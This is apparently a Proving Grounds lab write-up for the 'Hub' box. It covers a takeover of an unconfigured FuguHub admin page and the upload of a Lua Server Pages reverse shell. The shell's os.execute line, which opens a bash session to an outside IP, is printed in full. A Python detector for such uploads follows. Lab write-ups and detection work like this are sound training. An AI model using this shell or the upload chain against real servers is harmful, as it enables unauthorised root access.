Hub

Source: Proving Grounds | OS: Linux | Community Rating: Easy

Enumeration & Reconnaissance

  • I started with autorecon as usual and it exposed several ports:

    • SSH (22)

    • HTTP (80)

    • HTTP (8082)

    • HTTP (9999)

Service Analysis

  • I began with HTTP (80), but access was forbidden. Running a fuzzer revealed a license file at: http://192.168.197.25/LICENSE.txt

[Screenshot: HTTP (80)]

  • This file exposed information about the software in use, including the line:

    See the following page for license information:
    http://barracudadrive.com/purchase.lsp

[Screenshot: License]

Gaining Initial Access

  • I recalled a vulnerability with this software on Windows and did a quick check for a Linux variant, but found nothing at the time.

  • On HTTP (8082), I discovered a FuguHub site that had never been through its initial setup. It allowed me to configure the admin account and set a password.

[Screenshot: HTTP (8082)]
[Screenshot: Admin Configuration]
  • Once set, I noticed that the site included a Web File Server, which enabled file uploads. I looked for a CVE to automate the process and found CVE-2023-24078. Although I tried the PoCs, they didn't work as expected.

[Screenshot: Web File Server]
  • I then took a manual approach: I created a Lua shell (using the .lsp extension, as it's the extension exposed in the license file on HTTP (80) and the extension used in the PoCs) with the following content:

<div style="margin-left:auto;margin-right: auto;width: 350px;">
  <div id="info">
    <h2>Lua Server Pages Reverse Shell</h2>
    <p>Delightful, isn't it?</p>
  </div>
  <?lsp if request:method() == "GET" then ?>
     <?lsp os.execute("bash -c 'bash -i >& /dev/tcp/192.168.45.201/8082 0>&1'") ?>
  <?lsp else ?>
     You sent a <?lsp=request:method()?> request
  <?lsp end ?>
</div>
  • I uploaded the Lua shell using the Web File Server and then accessed it at: http://192.168.197.25:8082/revshell.lsp

  • That was it. I got access as root.

[Screenshot: Access as Root]

Lessons Learned

  • Even when standard HTTP access is forbidden, auxiliary files (like license files) can reveal details about the underlying software and potential vulnerabilities.

  • Unconfigured admin interfaces, such as the one on FuguHub, can provide a convenient entry point.

  • When automated PoCs fail, manually crafting a payload (in this case, a Lua shell) can get the job done.

  • Leveraging the file upload functionality can be a direct path to remote code execution.
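From the defender's side, the two observable artifacts of this chain are an uploaded .lsp file that calls into the OS and a write to an .lsp path followed by a GET of the same file. The script below is an added example (not part of this writeup or of FuguHub); the sample files and log lines are constructed, and the upload path prefix (/fs/) and PUT-based upload are assumptions about how the file server logs writes.

```python
import re
from typing import Dict, List

# Tags used by Lua Server Pages: <?lsp ... ?> and the <?lsp= ... ?> output form
LSP_TAG = re.compile(r"<\?lsp=?(.*?)\?>", re.DOTALL)
# Lua calls that spawn a process; a web file server should never serve uploads containing them
SHELL_CALLS = ("os.execute", "io.popen")
# Combined-log style line: client, method, path and status are what we need
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\w+) (\S+) [^"]*" (\d{3})')

def scan_lsp(name: str, content: str) -> dict:
    """Report which shell-spawning calls appear inside <?lsp ?> tags of one file."""
    hits = sorted({c for m in LSP_TAG.finditer(content) for c in SHELL_CALLS if c in m.group(1)})
    return {"file": name, "calls": hits, "alert": bool(hits)}

def scan_upload_root(files: Dict[str, str]) -> List[dict]:
    """Scan every .lsp file in a snapshot of the upload directory ({name: content})."""
    return [scan_lsp(n, c) for n, c in sorted(files.items()) if n.lower().endswith(".lsp")]

def upload_then_execute(log_lines: List[str]) -> List[str]:
    """Flag .lsp files written (PUT/POST, 2xx) and later fetched with GET by the same client."""
    written, flagged = set(), []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, method, path, status = m.groups()
        base = path.rsplit("/", 1)[-1].lower()
        if not base.endswith(".lsp"):
            continue
        if method in ("PUT", "POST") and status.startswith("2"):
            written.add((client, base))
        elif method == "GET" and (client, base) in written:
            flagged.append(f"{client} uploaded then executed {base}")
    return flagged

# Constructed samples (not captured from the lab host); the shell file mirrors the writeup's payload shape
SAMPLE_FILES = {
    "revshell.lsp": '<?lsp if request:method() == "GET" then ?>\n'
                    '<?lsp os.execute("bash -c \'id\'") ?>\n<?lsp end ?>',
    "index.lsp": "<p>You sent a <?lsp=request:method()?> request</p>",
    "readme.txt": "os.execute here is plain text and is never run as Lua",
}
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "PUT /fs/revshell.lsp HTTP/1.1" 201 0',
    '192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /revshell.lsp HTTP/1.1" 200 312',
    '192.0.2.11 - - [01/Jan/2024:10:01:00 +0000] "GET /index.lsp HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for finding in scan_upload_root(SAMPLE_FILES):
        print(finding)
    print(upload_then_execute(SAMPLE_LOG))
```

Running it alerts only on revshell.lsp (os.execute inside an lsp tag) and on the client that wrote then fetched it; the legitimate index.lsp and the inert .txt produce nothing.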
